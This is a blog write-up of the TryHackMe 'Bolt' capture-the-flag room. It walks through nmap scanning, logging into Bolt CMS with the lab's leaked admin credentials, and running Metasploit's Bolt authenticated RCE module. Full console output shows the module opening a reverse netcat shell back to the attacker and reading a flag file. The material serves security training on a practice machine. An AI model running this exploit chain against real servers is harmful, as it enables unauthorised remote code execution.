Aug. 26, 2020

Post Cover Gif animation

Bolt - THM Room

This is a quick writeup or another “just-me-taking-notes” thingy for Bolt TryhackMe’s room. This is a pretty raw writeup detailing all my process to root this room, flaws and all. You have been warned :)


[Task 1] What port number has a web server with a CMS running?

Let’s fire up an nmap scan:

└─$ nmap -A -sC -sV -T4

While nmap runs let’s take a look at the IP on the browser to see if there is any page being served. We get the default apache page:

Apache2 Ubuntu default page

and if we try to navigate to any other URL we can get the specific version:

Apache2 version

Let’s check nmap results:

└─$ nmap -A -sC -sV -T4
Starting Nmap 7.80 ( ) at 2020-08-26 20:22 EDT
Nmap scan report for
Host is up (0.38s latency).
Not shown: 997 closed ports
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40🇩🇪42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8***/tcp open  http    (PHP 7.2.32-1)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Thu, 27 Aug 2020 00:23:45 GMT
|     Connection: close
|     X-Powered-By: PHP/
|     Cache-Control: private, must-revalidate
|     Date: Thu, 27 Aug 2020 00:23:45 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: 0531cf
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Thu, 27 Aug 2020 00:23:44 GMT
|     Connection: close
|     X-Powered-By: PHP/
|     Cache-Control: public, s-maxage=600
|     Date: Thu, 27 Aug 2020 00:23:44 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: e716a7
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="">
|     </head>
|_    <body class="front">
|_http-generator: Bolt
|_http-title: Bolt | A hero is unleashed
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 65.93 seconds

[Task 2] What is the username we can find in the CMS?

Without much digging I’m gonna guess it is bolt based on the overall theme of the room and indeed it is accepted as valid. This is weird because the post we can see in the page mentions the user is jake and he also posts his password REDACTED could this be a bug on the room? (Spoiler: It is not. XD )

[Task 3] What is the password we can find for the username?

Post from Admin with a Password

We already got a password in the previous task.

[Task 4] What version of the CMS is installed on the server? (Ex: Name 1.1.1)

Since we have a username and password, we could try to google a bit common login page URL locations for Bolt CMS. When we try to access, we do get a login form.

Bolt Login form

Once we are logged in we can see the installed version in the footer toolbar and with that we get the answer to the CMS version:

Bolt version installed

Let’s move to the next question.

[Task 5] There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?

Using Exploit-DB we can look for RCE vulnerabilities for older versions of Bolt CMS.


Let’s move on.

[Task 6] Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit? (Ex: exploit/….)

We fire up msfconsole and do a search bolt cms to see the available exploits:

msf5 > search bolt cms

Matching Modules

   #   Name                                              Disclosure Date  Rank       Check  Description
   -   ----                                              ---------------  ----       -----  -----------
   0   auxiliary/admin/sunrpc/solaris_kcms_readfile      2003-01-22       normal     No     Solaris KCMS + TTDB Arbitrary File Read
   1   auxiliary/gather/ipcamera_password_disclosure     2016-08-16       normal     No     JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure
   2   auxiliary/gather/nuuo_cms_bruteforce              2018-10-11       normal     No     Nuuo Central Management Server User Session Token Bruteforce
   3   auxiliary/gather/nuuo_cms_file_download           2018-10-11       normal     No     Nuuo Central Management Server Authenticated Arbitrary File Download
   4   auxiliary/scanner/http/ektron_cms400net                            normal     No     Ektron CMS400.NET Default Password Scanner
   5   auxiliary/scanner/http/s40_traversal              2011-04-07       normal     No     S40 0.4.2 CMS Directory Traversal Vulnerability
   6   auxiliary/scanner/http/squiz_matrix_user_enum     2011-11-08       normal     No     Squiz Matrix User Enumeration Scanner
   7   auxiliary/scanner/http/vcms_login                                  normal     No     V-CMS Login Utility
   8   auxiliary/scanner/misc/cctv_dvr_login                              normal     No     CCTV DVR Login Scanning Utility
   9   exploit/aix/rpc_cmsd_opcode21                     2009-10-07       great      No     AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   10  exploit/linux/http/cayin_cms_ntp                  2020-06-04       excellent  Yes    Cayin CMS NTP Server RCE
   11  exploit/linux/http/tiki_calendar_exec             2016-06-06       excellent  Yes    Tiki-Wiki CMS Calendar Command Execution
   12  exploit/linux/http/vcms_upload                    2011-11-27       excellent  Yes    V-CMS PHP File Upload and Execute
   13  exploit/multi/http/bolt_file_upload               2015-08-17       excellent  Yes    CMS Bolt File Upload Vulnerability
   14  exploit/multi/http/cmsms_object_injection_rce     2019-03-26       normal     Yes    CMS Made Simple Authenticated RCE via object injection
   15  exploit/multi/http/cmsms_showtime2_rce            2019-03-11       normal     Yes    CMS Made Simple (CMSMS) Showtime2 File Upload RCE
   16  exploit/multi/http/cmsms_upload_rename_rce        2018-07-03       excellent  Yes    CMS Made Simple Authenticated RCE via File Upload/Copy
   17  exploit/multi/http/familycms_less_exec            2011-11-29       excellent  Yes    Family Connections less.php Remote Command Execution
   18  exploit/multi/http/getsimplecms_unauth_code_exec  2019-04-28       excellent  Yes    GetSimpleCMS Unauthenticated RCE
   19  exploit/multi/http/lcms_php_exec                  2011-03-03       excellent  Yes    LotusCMS 3.0 eval() Remote Command Execution
   20  exploit/multi/http/log1cms_ajax_create_folder     2011-04-11       excellent  Yes    Log1 CMS writeInfo() PHP Code Injection
   21  exploit/multi/http/monstra_fileupload_exec        2017-12-18       excellent  Yes    Monstra CMS Authenticated Arbitrary File Upload
   22  exploit/multi/http/navigate_cms_rce               2018-09-26       excellent  Yes    Navigate CMS Unauthenticated Remote Code Execution
   23  exploit/multi/http/october_upload_bypass_exec     2017-04-25       excellent  Yes    October CMS Upload Protection Bypass Code Execution
   24  exploit/multi/http/polarcms_upload_exec           2012-01-21       excellent  Yes    PolarBear CMS PHP File Upload Vulnerability
   25  exploit/multi/http/sflog_upload_exec              2012-07-06       excellent  Yes    Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
   26  exploit/multi/http/totaljs_cms_widget_exec        2019-08-30       excellent  Yes    Total.js CMS 12 Widget JavaScript Code Injection
   27  exploit/multi/php/php_unserialize_zval_cookie     2007-03-04       average    Yes    PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
   28  exploit/unix/webapp/bolt_authenticated_rce        2020-05-07       excellent  Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution
   29  exploit/unix/webapp/get_simple_cms_upload_exec    2014-01-04       excellent  Yes    GetSimpleCMS PHP File Upload Vulnerability
   30  exploit/unix/webapp/havalite_upload_exec          2013-06-17       excellent  Yes    Havalite CMS Arbitary File Upload Vulnerability
   31  exploit/unix/webapp/instantcms_exec               2013-06-26       excellent  Yes    InstantCMS 1.6 Remote PHP Code Execution
   32  exploit/unix/webapp/joomla_akeeba_unserialize     2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   33  exploit/unix/webapp/joomla_media_upload_exec      2013-08-01       excellent  Yes    Joomla Media Manager File Upload Vulnerability
   34  exploit/unix/webapp/libretto_upload_exec          2013-06-14       excellent  Yes    LibrettoCMS File Manager Arbitary File Upload Vulnerability
   35  exploit/unix/webapp/skybluecanvas_exec            2014-01-28       excellent  Yes    SkyBlueCanvas CMS Remote Code Execution
   36  exploit/windows/browser/ie_execcommand_uaf        2012-09-14       good       No     MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
   37  exploit/windows/http/ektron_xslt_exec             2012-10-16       excellent  Yes    Ektron 8.02 XSLT Transform Remote Code Execution
   38  exploit/windows/http/ektron_xslt_exec_ws          2015-02-05       excellent  Yes    Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution
   39  exploit/windows/http/kentico_staging_syncserver   2019-04-15       excellent  Yes    Kentico CMS Staging SyncServer Unserialize Remote Command Execution
   40  exploit/windows/http/umbraco_upload_aspx          2012-06-28       excellent  No     Umbraco CMS Remote Command Execution
   41  exploit/windows/local/bypassuac_comhijack         1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   42  exploit/windows/nuuo/nuuo_cms_fu                  2018-10-11       manual     No     Nuuo Central Management Server Authenticated Arbitrary File Upload
   43  exploit/windows/nuuo/nuuo_cms_sqli                2018-10-11       normal     No     Nuuo Central Management Authenticated SQL Server SQLi
   44  exploit/windows/smtp/njstar_smtp_bof              2011-10-31       normal     Yes    NJStar Communicator 3.00 MiniSMTP Buffer Overflow

Interact with a module by name or index, for example use 44 or use exploit/windows/smtp/njstar_smtp_bof

msf5 > 

by looking at the results returned and having found the vulnerability on Exploit-DB we get the answer to the room question. Let’s try to exploit that in the next step.

[Task 7] Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit

Let’s configure the options for our exploit, by doing show options

[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                8***                   yes       The target port (TCP)
   SRVHOST                    yes       The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses.
   SRVPORT              8080                   yes       The local port to listen on.
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST tun0
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
msf5 exploit(unix/webapp/bolt_authenticated_rce) > set PASSWORD REDACTED
PASSWORD => boltadmin123
msf5 exploit(unix/webapp/bolt_authenticated_rce) > 

Let’s run the exploit so we can answer the last question:

[Task 8] Look for flag.txt inside the machine.

msf5 exploit(unix/webapp/bolt_authenticated_rce) > run

[*] Started reverse TCP handler on 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "hxzhm".
[*] Found 4 potential token(s) for creating .php files.
[+] Deleted file evhhumxnxs.php.
[+] Deleted file jfdcqabl.php.
[+] Deleted file hgpputegi.php.
[+] Used token dc684ac30691d198a52d1110d6 to create helqvqylpa.php.
[*] Attempting to execute the payload via "/files/helqvqylpa.php?hxzhm=`payload`"
[*] Command shell session 7 opened ( -> at 2020-08-26 21:26:37 -0400
[!] No response, may have executed a blocking payload!
[+] Deleted file helqvqylpa.php.
[+] Reverted user profile back to original state.

[*] Trying to find binary(python) on target machine
[*] Found python at 
[*] Using `python` to pop up an interactive shell
cat /home/bolt/flag.txt
cat /home/flag.txt

The shell we got is quite basic and in my case we it hanged a lot of times. I was unable to upgrade that shell to meterpreter, but to be honest I tried it just once and moved on. I tried a bit of exploring probing some paths with cat looking for flag.txt and found it rather quickly.

That’s it for Bolt room. Hope you enjoyed it!

As usual, happy hacking.

comments powered by Disqus